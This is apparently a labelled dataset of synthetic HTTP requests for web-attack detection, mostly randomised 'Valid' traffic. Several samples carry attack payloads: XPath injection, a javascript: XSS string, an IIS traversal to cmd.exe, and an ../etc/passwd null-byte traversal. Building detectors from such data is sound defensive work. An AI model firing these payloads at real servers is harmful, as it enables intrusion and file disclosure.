GET /lNJW9sz/ii/oNo2oxOea/ls8ax/jagJo2HX8N.php3?Q1xtermaXautoexecC=5498591&geo1S6n=Oiacmi&ekcsi=siX8E&bo=tlgnael HTTP/1.0
Host: 25.47.28.21
Connection: keep-alive
Accept: text/html;q=0.3
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.4, compress;q=0.7, identity, compress;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 187.70.10.21
Cookie: hs=lltsef;OexMcnm3id=0633324859;sdyeedod=sebia
Cookie2: $Version="52"
Date: Tue, 14 Jun 05 23:45:01 CET
ETag: "5_JedyMT5Ej0gYQ_"
Expect: 100-continue
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Fri, 30 Jul 04 09:43:32 CET
If-Unmodified-Since: Fri, 02 Apr 04 06:08:07 GMT
If-Match: "9TdE8O8wX7GkCo2dFZ"
If-None-Match: "_Gm@ELeqI6w@fUIFhG"
If-Range: *
Max-Forwards: 2001
MIME-Version: 7.7
Pragma: sgeqspe=5qspt5tt
Proxy-Authorization: NTLM aGFkbHRyb0RxYVRiMHQwaWV0bjY0bXNkMGg2emV0aHR0bnJTTThI
Authorization: Digest algorithm=MD5-sess
Range: 0-,7-80207
Referer: /taRieprh.mspx
TE: trailers,trailers,deflate;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/7.7 (Machintosh; U; Mac OS X 9.9; zn-gn; rv:7.5.2) Gecko/95610581
UA-CPU: Sparc
UA-Disp: 0480,6767,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0290x1154
Via: FTP/6.7 www.ocus7e.tiff
Transfer-Encoding: compress
Upgrade: 0Hdp/7.3, nXu/9.2, blie/9.3
Warning: 785 139.199.253.164:9 "stduoo4mei" "Wed, 12 Dec 07 02:11:19 CET"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26908
Start - Id: 11203
class: Valid
GET /DKqeuyF.BSstdinE1S.exe?TN=nee%40tAdivtR&niape=qpqjCZ&ooxeHtv7w1a=lts HTTP/1.1
Host: www.tdtmliveo.be:80
Connection: close
Accept: image/*;q=0.9
Accept-Charset: x-mac-roman;q=0.6, x-mac-cyrillic;q=0.5, koi8-r, iso-2022-jp;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: 5e=RFuc9un
Client-ip: 57.60.178.137
Cookie: jaEaaht=4;un3=n2mRqp
Cookie2: $Version="256"
Date: Mon, 28 Apr 08 14:15:29 CET
ETag: "zXSC2Mz4_ZtVSzXpi"
Expect: e8howtr
From: oner40@a3mRaitss.com
If-Modified-Since: Thu, 26 Feb 09 09:00:30 UTC
If-Unmodified-Since: Wed, 12 Mar 08 24:18:09 CET
If-Match: "iJpf3PWf3c-xqFfJes4"
If-None-Match: *
If-Range: "FMRDR1VMg5B2e2z"
Max-Forwards: 3243
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="irua"
Authorization: Basic cm9pdDJ0aDpwbVhtbg==
Range: -62895,1183-7810
Referer: /rromoc/nEu1gd/Vcalmd/ptvua2/tifdrat.png
TE: deflate;q=0.3
Trailer: Range
User-Agent: a3WBRG@U http://www.ead1.cz
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1597x0250
Via: HTTP/4.2 www.9fiucli.gif, 3.7 57.35.175.255
Transfer-Encoding: h70enh; uost9a=n58yl
Upgrade: soi/9.2, sgsr8/4.6
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11203
Start - Id: 18749
class: Valid
GET /88TxQFlSKg/h8MA6WkOdFuZD/i3etnstr1blt/aky/fVQK/F3N3o6n8.AL/kK6XeKtS0/fgcSg.cgi?so=910510&gamobject3Wl%uJ=nndiwawEiq&xqrLTvj-=3e&tsf1e=6998&qkcd=rgxss&aia=Ma&APipiqoM=+%25u&Hrsyoevlora=3%3Efte&wa24heaite5oGtw=e3QUtx.&Mosqfaro=rof&oqse=fErads&aee9=r.FuPyuA&FdaHohgb1kad9t=7Wgz&ry=htpasszi&1tgeEtye=1499811 HTTP/1.0
Host: 232.114.62.246
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.5, utf-7, windows-1254
Accept-Encoding: identity
Accept-Language: *;q=0.3
Cache-Control: max-stale=2
Client-ip: 19.188.65.223
Cookie: 0BcnhvisvCnor=sae ceto4 ok;eslre=84046372;Arnull7=5;ojdnoeh6wvgteui=7odPiW@;ce1hnE5dibe8=742975;n0ioesiumT56r=pwCBCvnsQ
Cookie2: $Version="1"
Date: Sat, 28 Jan 06 11:04:21 GMT
ETag: "eMtpcpbh@B.vn9rAhj"
Expect: cyUsauwn=ypnTpah
From: envreer4@lEts7.gov
If-Modified-Since: Mon, 29 Mar 04 20:43:52 GMT
If-Unmodified-Since: Mon, 02 May 05 08:33:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 0.0
Pragma: alfeeit=ip2l
Proxy-Authorization: Basic ZXpobzppN2U3cTVlZQ==
Authorization: S2hjN hETa=nbdtSe
Range: 43867-
Referer: http://www.tut46sye.it/ldoebo/OoEc/fahone/Wa0aise.jpg
TE: gzip;q=0.7
Trailer: Accept
User-Agent: cvxv89LR http://www.aqernr.org
UA-CPU: 68000
UA-Disp: 752,4892,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 854x2880
Via: 8.6 0.227.18.242, 1.2 148.231.43.117
Transfer-Encoding: gzip
Upgrade: iwlt/7.1, 2hr1s/4.8, inkArL/0.1, fttws/7.1
Warning: 921 www.wRltoroI.gif "hibn" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18749
Start - Id: 35819
class: XPathInjection
GET /wnsiderxr/nbanAtgzslaipaeijfhy/IperlxtermJx/ibbRemglu/Tcmc7s/rv4l/l7GJrcpKsye/lrnpstdinC3d.P.pl?ce=tAgsfche%27+++or++++6+%3C+++++count%28path%2Fchild%3A%3A*%29++or++++%27wtqtoy%27%3D+%27 HTTP/1.0
Host: www.ita1iuedra.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, identity, deflate, deflate
Accept-Language: r6t0e7-Xdahr;q=0.3, ee-aR, 9-bncn, oy3-t82l3iv9
Cache-Control: no-store
Client-ip: 46.200.186.58
Cookie: o7zeida1rmsonle=ts3edH1cisfseSe5te;vEGcn=dassntoArUiFe;dsClr=wglrlt4d8awfnr5hae;2c3oIgrZora=pd$o;nc6=bZ00l
Cookie2: $Version="2"
Date: Thu, 18 Aug 05 09:38:23 CET
ETag: "F.kqxYY8TNuKf1u"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Sun, 16 Jan 05 02:53:56 GMT
If-Unmodified-Since: Sat, 09 Feb 08 15:51:28 GMT
If-Match: "OZ1Md3zff@LVMyik2"
If-None-Match: *
If-Range: Thu, 08 May 08 14:51:39 GMT
Max-Forwards: 148
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Basic M3RVc206ZEZhNWxUZA==
Range: 205-0247
Referer: http://www.0itnood.net/loIR/aynrrt/cbrt/5lumln2/hehmn.png
TE: trailers,trailers
Trailer: Via
User-Agent: atnbuessa (d80wvx1S)
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: enaEsh/7.3 93.96.205.177:2, FTP/9.8 137.136.214.140, 9.5 www.bhth8ims.png:438
Transfer-Encoding: compress
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 952 www.gere3lt.gif "ajcLu" "Fri, 03 Aug 07 19:36:17 GMT"
X-Forwarded-For: 43.11.206.228
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35819
Start - Id: 14450
class: Valid
GET /n@bstdinlog3uQ0Dq3ZE/_U6pv81Wh/tpI6ib/4a1oRE/F5v0mJoOnd.shtml?raetugedNsnoa=Zek&enalu5mutjjoi=ys6yLXZ40Ry&emanTzistt=dinshoEptoe5lG&egatmiinU2yi=3e%26catiimgf-lsnn0ds0rox&GW_WplRscriptXUbody=8fA2r&OzHtX8=eRofykra24te&NheH.hx.C=02&bs9=d9iH&eyhmAfieseeM=%5B%25h&feUehsh7som9Lac=1707136957&y@xp_m7yGDE=s&iuiaunuiSibtdi=6960594051&ctw=adlrohssr&gmyi=3684049 HTTP/1.1
Host: www.dye6s.fr
Connection: close
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: fepnto=n6vrPi
Client-ip: 36.4.152.195
Cookie: 2zXVlscript2T%u=xoekiekai
Cookie2: $Version="15"
Date: Thu, 17 Apr 08 06:20:28 GMT
ETag: W/"jDK252a@c3hzQddGNCD"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Wed, 15 Apr 09 09:27:33 CET
If-Unmodified-Since: Tue, 16 Jun 09 13:38:14 UTC
If-Match: "F6Li4GHvcLqN-aldQ."
If-None-Match: *
If-Range: Fri, 14 Oct 05 06:19:41 CET
Max-Forwards: 781
MIME-Version: 2.3
Pragma: hznsdhlt=rra
Proxy-Authorization: oa7d0 neletwg=tdqaeth
Authorization: Basic cmFpZWR1OlRwc2VjcnNo
Range: -517,627-,587-701
Referer: /SrolkbYm/ldhgpse.js
TE: gzip;q=0.9,deflate;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/9.7 (compatible; Konqueror/8.8; Win 9x; dbecn; ucso; oaeehqe)
UA-CPU: 68000
UA-Disp: 854,140,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5927x518
Via: HTTP/3.9 246.65.10.128
Transfer-Encoding: identity
Upgrade: trkh/8.6, taslsi/0.6, se2/8.7, etaY/5.5, dpsae/7.4
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 309851
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14450
Start - Id: 14301
class: Valid
GET /sv/u@QlA/37cfBQNzLzT/H3o/rG8rTfmEJuzrYfM/tSKFJBD.@/VnzSFZ0V9object.vua/av4di3shpoo/oeFW6TH4-/LLGcat.php3?Dh=aUpweiasoOis&ne4hx39i4ep=+ia&shMcaNsTh=uO6F_Vt9&h9wctrdseaa=orseertneyltbii&o89gY@=+E&stfchnremwrisde=eo&rse=khtbodyy%2Ba+g%7El%26h%24metahttpsTu&UI-Oh0=tePYW9k HTTP/1.0
Host: www.eweadder0m.ch
Connection: close
Accept: application/*, image/*, image/gif
Accept-Charset: x-mac-cyrillic;q=0.7, cp-932, x-mac-ce;q=0.3, windows-1257
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 18.153.158.142
Cookie: iFuoha1bA6a=11088979
Cookie2: $Version="42"
Date: Sun, 01 Mar 09 06:56:00 CET
ETag: W/"0Rl7VLkN37lA7LREvy"
Expect: mdtii
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Thu, 26 Feb 04 19:06:09 UTC
If-Unmodified-Since: Fri, 23 Apr 10 07:45:23 UTC
If-Match: "oSLJYGCwurQGhzpS8i"
If-None-Match: *
If-Range: "VHi6H0O-0yJX_6-"
Max-Forwards: 03
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: ui0hae s6yRyaz=a0uhr
Authorization: nwes tePeoaL=pohcrE
Range: 61-,43-,51336-
Referer: http://eorReax.ch/rDnze/iiglttj.js
TE: trailers,deflate;q=0.8,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/3.2 (compatible; Konqueror/9.8; Open BSD i586; wqect)
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 007x8553
Via: 9.1 www.rJhm5o5.css
Transfer-Encoding: compress
Upgrade: anU/9.4, sythne/4.7, Tpsin/2.0, avn6ed/3.3, renTe/6.2
Warning: 948 75.211.234.239 "dffhhie0act" 
X-Forwarded-For: 25.143.155.19
X-Serial-Number: 731610342681835186
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14301
Start - Id: 47869
class: XSS
GET /aVlK9XW5M1VC.kYk/25SlYRiOd_Q3/zsueecvewnNxTr/hzrrhb/rr.-p/aesnAVyj7y4DF5nf_eIv/il6riba.jsp?l6t0d9Iah9u=rG_7&arew4e=+%3F&dbjrvhnb2a=u0%29ooexecgrn+access_logae-mhd&fsdart9raPefj=aj%3Eo9&sraam=bgsound+&heeciis=19-WBrc&cbwhh=shavingoesTsh&httpGYk=617&rogzkfpoeosgOs=53201963&ntstq=javascript%3A+alert+%28++%22++++ldt.0epdn4%22%29&0iltzoE=sasmtUheamsoiX&Qttv=ln&hynnr=Ml%3F HTTP/1.1
Host: 127.57.118.47
Connection: keep-alive
Accept: image/*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: mo='ra7ofSz'
Client-ip: 110.70.167.237
Cookie: Xjmailretc8lincludeAE=8jamh +inputlogchp)$oh~sprocessing-instruction;piDLr81sKaon=DUtsf
Cookie2: $Version="8"
Date: Sun, 30 Aug 09 06:48:53 UTC
ETag: "jyvTDLdVK3kRRBHcIa"
Expect: hhr4=sfe1
From: wu4c60i@McindieetT.fr
If-Modified-Since: Wed, 13 Aug 08 08:01:55 GMT
If-Unmodified-Since: Fri, 08 Jun 07 08:21:19 GMT
If-Match: *
If-None-Match: "uWgmd0ocJMciF1VU"
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 1
MIME-Version: 9.4
Pragma: ltsOa4ai=3hplmear
Proxy-Authorization: 94wiw ilu2a=emsx
Authorization: Basic ZW9hZU5zcDpzYmFpZXc=
Range: 541-3,060-23987,670-3
Referer: http://7sEd.net/itk9Oke/isced/isctmxf/hho1d.tiff
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: Mozilla/9.7 (Windows; U; Win 9x 2.2; po-tu; rv:1.3.7) Gecko/18639084
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: Rmveb/7.9 25.177.125.9, 8.6 www.tbr0By.shtml
Transfer-Encoding: deflate
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 307 50.130.247.108 "2mlin3oeoesToap" "Mon, 23 Feb 04 03:39:06 GMT"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47869
Start - Id: 36476
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 33.171.43.48
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, gzip;q=0.3, compress;q=0.1
Accept-Language: *;q=0.2
Cache-Control: min-fresh=0529
Client-ip: 92.39.253.160
Cookie: se6eibF=rdqnpezziidIty;i2xsfem=an1creb9;9aijsg=58896;rdctaiwGetfsrH=tscriptoaognwhtpasseft
Cookie2: $Version="987"
Date: Fri, 17 Jul 09 06:40:52 CET
ETag: "b.tqILcRPgjyibN"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Sat, 08 Sep 07 12:42:09 CET
If-Unmodified-Since: Thu, 05 Jan 06 12:22:59 GMT
If-Match: "QZD.TK-Qom_HbzY_.p"
If-None-Match: *
If-Range: Fri, 25 Apr 08 10:27:49 GMT
Max-Forwards: 436
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM d09jRGlnc2VnaWJyZWthdDk0bWU3NzlpbW5qbk9zRXNoZGx0TWVuVWRhb3Fvbw==
Authorization: NTLM bHBzYWVzaGVBdXcycmhkQXNvbG9PYmVPSW0zZU1rRVJhZXo=
Range: 57-,410056-,436232-1281
Referer: http://ntOr.net/weoth3y/ebo6ns/teum.sh
TE: trailers,deflate
Trailer: Authorization
User-Agent: uvziyDq http://www.ge2oPton.biz
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 0.2 195.202.24.221:66427, FTP/4.4 182.0.72.61, HTTP/4.6 180.189.39.27
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36476
Start - Id: 31114
class: Valid
GET /bguiAqhE0mM2to/moKhf1R4XXYh6/t1rhNeo/@V.tiff?o7eiarso6=oQv&0MTBOOb0K6Us=funionc%3Du&siNjRea=927&ugangn6selmp=ewpHMdNH&0CGcp53l=skst&83rZyMqCPvl=eB339BB&8lueemet=1srooi&ndoo21usghd=aix%2F%27&oasa5=8htscriptghkrcmdId&boOowoaeut6uql=lwo8&dZSAtet=idd+%7Ek&Rrm=byts&ssaiwl=12172 HTTP/1.0
Host: www.enHswyWmh.ch:2
Connection: keep-alive
Accept: audio/*, image/png;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 148.177.138.70
Cookie: 0ftp-E8FISpUIR=53316947;uGyq=ziaahserZeoj;8ewqtb=589
Cookie2: $Version="63"
Date: Fri, 26 Oct 07 07:36:28 GMT
ETag: W/"X8IqT4uU2JG9mV1H"
Expect: 100-continue
From: y6Jyr@oaos.uk
If-Modified-Since: Tue, 27 Jan 09 09:16:23 UTC
If-Unmodified-Since: Mon, 09 Feb 04 04:37:54 CET
If-Match: "46IoSsaxR0lFqYJVZc"
If-None-Match: "HSUqOLO@_MY.xw5Qk"
If-Range: Wed, 24 May 06 20:15:15 GMT
Max-Forwards: 8226
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic clNjbzpuNWVl
Authorization: Rtdng vlyb=aebDlmt
Range: -245173,089218-6894
Referer: http://tvdha.cz/Lyam/fhitenr/dUl7t/d9mnre.png
TE: trailers
Trailer: TE
User-Agent: 9fmo8rznm (nTAy_IbYw; aomh4@; tPOysI1kU)
UA-CPU: MIPS
UA-Disp: 195,195,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2629x943
Via: 5.9 160.43.92.227
Transfer-Encoding: deflate
Upgrade: Vpd/5.7, eiJ/4.6, lehe/1.0
Warning: 550 www.nnascs.js "Fnawrirehedss" 
X-Forwarded-For: 38.240.20.147
X-Serial-Number: 16589272146
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31114
Start - Id: 46057
class: PathTransversal
GET /8t@wgetMstdinHfJUdhhZr/iBINp4RoLffzz@t7Ry/dhfiA2et/leesnthei9at/n72_/edymTsouisAos/aIvqz8cJ/fcnehs/28xa1aINhlkfEnaefn/te42sop/ddWinho2oshorw7z.jpeg?usdOeha=%3Ctmpoohc-&tmqr1=iawaus&.0winnt2I=%3A0r%24-l2d%2B&9fbsloa=6&btqoAW=2924540&qcMojtmp984=nba+fef+in%24eamer+xe&ixsr=gie&ayhl93hmxxw=i10objectipwpd&cybrttir=Fs%5Ceensystem%5Dc6Nsy%25ea&ordLC=ojPB&3AMTL=9&mcoEkd5myelc3z=6048&QBDTapN=342701&ru=bdyr.3P2E&TPwKFR=4 HTTP/1.0
Host: 144.149.228.115:80
Connection: close
Accept-Encoding: compress;q=0.5
Accept-Language: omnaonda-DiNmt;q=0.3
Cookie: safesqgYbaa=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;senifp=4:z;t9j=59212741
Cookie2: $Version="7"
Date: Tue, 26 Sep 06 15:08:37 UTC
Expect: 100-continue
If-Match: "BMwmY8FRi3U8Sof1gjU"
Max-Forwards: 8733
Pragma: no-cache
Referer: /uwaaa7z/cfds/danpru9/neiQy.rar
User-Agent: aqh6eaoionum
Transfer-Encoding: compress

null

End - Id: 46057
Start - Id: 12740
class: Valid
GET /yIy@Ya47aM.ieDTlSQU/Iruea.jpeg?nytTeO9fptp=b7der&wfWvbscript=l%3Ajjsock_streamwPsnode&Srhhosy1rgjeii=32&rerd4gouegewoe3=3EZq&rxos5qkhhdaihoe=61438&r9gri5Haaiurt=5menin&Oeobmardc=ontt&e5_RpositionGJjnA3X=8315&neesuw=T%28ar HTTP/1.0
Host: www.niotbo8lte.it:80
Connection: close
Accept: audio/*;q=0.6, video/*;q=0.7, application/*
Accept-Charset: iso-8859-4, x-mac-chinesetrad;q=0.1, windows-1252, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 150.251.26.209
Cookie: @t13u7Uk6=a9reh;lszr=eK2@HO5zZ0
Cookie2: $Version="599"
Date: Fri, 04 Dec 09 13:51:22 UTC
ETag: "zPYtQWo0FKB@2BJwNCp5"
Expect: r6iru=bcnoh
From: Stwoo@9oieten.net
If-Modified-Since: Fri, 31 Aug 07 17:15:20 GMT
If-Unmodified-Since: Tue, 08 Feb 05 15:47:08 GMT
If-Match: *
If-None-Match: "Dju7IgCbH-bJwiBLv_i7"
If-Range: *
Max-Forwards: 5453
MIME-Version: 4.8
Pragma: CkpYaaDc='fto1lc9d'
Proxy-Authorization: stgyt iacOt=tu9k
Authorization: NTLM am5lMWFpY21tZWF0aGU2aXVzcnR0cmRhbmFlZW0ycnRJa3JtbWlJbmkwYm5wN2c=
Range: 55-4,16-,6608-865431
Referer: http://www.see8.be/shgrhi6/bneRejW/1nophrt/Garrc.tiff
TE: deflate;q=0.8,gzip;q=0.4,trailers
Trailer: Host
User-Agent: Mozilla/2.2 (Windows; U; WinNT 5.8; im-3b; rv:6.8.4) Gecko/43438706
UA-CPU: MIPS
UA-Disp: 509,294,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 596x179
Via: seim/5.3 44.54.107.156:6422, 3.5 www.nulpcS.htm
Transfer-Encoding: gzip
Upgrade: eooi/2.7, van/3.8, dpde/7.1, deu1tv/8.1
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 91220427481224
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12740
Start - Id: 2110
class: Valid
GET /dzU4-xKze8p7S-Ms/7AXM/2E036rAasedoteutjuxy/mwkd4lnee/hJp7n8ztN.sh?jftpisFr=sfcJOHEaT&bodychildexecyPArZ=0i&spriU45sEr=tdiisd5%24pegE&nkssel9wTabn=l&53x=%26o&.1.mQp_YC=1&isyrcFiEM=5309452&mhtiewSurhid=97466154&miadbtrtiaetaat=iPvd9eopw%29agopq&2b9tecaTtosiUf=iFmc&6niqexrhalcewoH=7807363&s2ntlEor9vtsS=90&rknqir=%27tc%2BE&f9scriptHmocha=3548&zeRgcsIaaditT=refDaZconnectna+i0N HTTP/1.1
Host: www.rdtc5aav.be:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-ce, x-mac-hebrew;q=0.7, iso-8859-8-i;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=82486
Client-ip: 152.109.97.244
Cookie: jtysnbgrtteE=dr870nEoa;e1BtTdniiice=jneaofori;rdbC7ditoe7h=bmB;tmtipe=fuzLkzC2Zx
Cookie2: $Version="5"
Date: Wed, 24 Aug 05 02:41:13 GMT
ETag: W/"PkiXyIMVpqvo_R_eDskr"
Expect: 100-continue
From: tsibtTt@iayoo1reS.gov
If-Modified-Since: Tue, 22 Jul 08 23:43:11 UTC
If-Unmodified-Since: Wed, 24 Oct 07 09:00:02 GMT
If-Match: *
If-None-Match: "T-2vjQ8k4hdvsi@"
If-Range: "2LGmtzhDlUC3tFE@"
Max-Forwards: 59
MIME-Version: 1.6
Pragma: fu3vgF='3N'
Proxy-Authorization: Digest qop=auth
Authorization: drweoc nre80a=ldaeuO
Range: 621-,04-,-085540
Referer: http://www.tipeNN4.uk/aet5mi/fsntLwf/tlib/osw0urye/Osjl7s.cfm
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/8.8 (Windows; U; Win98 1.7; lu-cf; rv:1.3.0) Gecko/59857813
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3159x969
Via: 7.3 239.109.228.106
Transfer-Encoding: gzip
Upgrade: gknraU/3.9, fTtni/6.7, lssm/8.2, Jw7uEL/4.0
Warning: 551 www.azMe.gif "eLopsrhhmd3yte9t3h" 
X-Forwarded-For: 138.19.39.77
X-Serial-Number: 86831
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2110
Start - Id: 32810
class: Valid
POST /sKK8Ru/htkgeWt4eIx2adtr/krct/iwm1S/xtdRzdYqQOxA3/atw2soN/eehtF8h0ginsufdr/ow2-8galOJ5D9H/a6lRg9P0yzPoNZSHB/Eef/tNwget/odIeideeizo.html? HTTP/1.1
Content-Length: 183
Content-Language: jo,5
Content-Encoding: compress
Content-Location: /dsps/4hsi/adOness.php
Content-MD5: c2VjOHJlRkllemFodGR0Qw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Feb 07 16:03:14 GMT
Last-Modified: Sun, 08 Mar 09 19:56:55 CET
Host: 245.197.197.3:80
Connection: close
Accept: video/mpeg, application/zip, audio/*;q=0.6
Accept-Charset: euc-tw, iso-8859-4, x-mac-arabic, x-mac-icelandic
Accept-Encoding: *;q=0.8
Accept-Language: zaZda-iRtedon;q=0.5, 6rhw-7h, iodixr-ir;q=0.2
Cache-Control: no-cache
Client-ip: 139.90.236.187
Cookie: warfatnnilD=mNt;7hzSA8thoe=r;ihran=710315829;8bG6f17w=th@lLX.;odfnOnl9amte=55;fvktFtI3JxB9=26
Cookie2: $Version="8"
Date: Sun, 19 Mar 06 07:32:57 CET
ETag: "HlEC7lCerhIraTrPiUm"
Expect: nArhhaaI=snlrmioc
From: hnasx@etin.de
If-Modified-Since: Tue, 15 Apr 08 18:49:11 CET
If-Unmodified-Since: Sun, 25 Nov 07 19:53:13 UTC
If-Match: "0EJ_gUcfJvPfHKYL6d"
If-None-Match: *
If-Range: *
Max-Forwards: 46
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic anF0emVhb3I6U2lnbnhk
Authorization: Basic ZWdhdDpoYWlvag==
Range: -92,-97
Referer: http://1ituo.gov/iAoiHei.js
TE: chunked,deflate,chunked
Trailer: Accept-Encoding
User-Agent: 0ntat/2.8.8.2.3
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 453x545
Via: 8.1 65.55.5.241, 4.0 75.224.185.92, HTTP/6.1 www.316d.jpeg
Transfer-Encoding: identity
Upgrade: nrXe/0.2, hra/3.3, 1dD/9.3, i8at4g/1.4, oeloli/9.2
Warning: 045 www.elolydv.png "pbietttuaolq" "Sat, 01 Sep 07 19:08:20 UTC"
X-Forwarded-For: 205.232.208.249
X-Serial-Number: 6352677
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CysbWc=7215235&atohnlir=)e|&9iuutlv=12&dneepho=tQEi6z9KZyQB&tst4agyohn=49&@wbgsound4EaOGrQ=77&QQhbA7l@M=27062&18rB4hre=:&hynt7onnE=iAtG6enaaagL&sttRsrtew=581349&ZcatOm2D@t=66624

End - Id: 32810
Start - Id: 2422
class: Valid
GET /rc_/mu_BG.yKs6UBe6IP.tiff?ofmvmsnnna7d=202488&YAQYF6EevalwhereY=iDaehdsn&uw4raht7he=6584&aawtFllfhtsu=177N%40&oc=sEDucTG29s&x91zlarSttf2sgq=eatv&a2vncesosog=alfx15as&iTIauj7rFH3=hS84li-r.i.&deiroSioty1=uloi%3Dtmpadmin%5C&9OsuBshbdjlmki=t78egRejVsw&Ccpyg0=ejB0VuT4metJ&childov7A.RD2W=eareugcIrl&ess0nwi8lcf=mSvH0&hkIbOaaa7kaux=5mcse6us75wan5 HTTP/1.1
Host: www.Eo4nf.gov
Connection: keep-alive
Accept: application/*;q=0.7, video/*;q=0.2
Accept-Charset: x-mac-japanese, big5;q=0.3, iso-8859-5
Accept-Encoding: compress;q=0.2
Accept-Language: *
Cache-Control: max-age=01020
Client-ip: 182.119.30.136
Cookie: zdyeqqrv=3;c8cx=7348796567
Cookie2: $Version="593"
Date: Tue, 04 Dec 07 09:50:38 UTC
ETag: W/"h6BO4lSOeHIukUAXMVV"
Expect: 100-continue
From: enlhjlne@u3aeaeei.biz
If-Modified-Since: Sun, 09 Jan 05 12:20:10 UTC
If-Unmodified-Since: Sat, 20 Sep 08 19:13:42 GMT
If-Match: "4s8QQ0v8OT@RBSlNd7"
If-None-Match: "HYTGpz0AGe3zavtz"
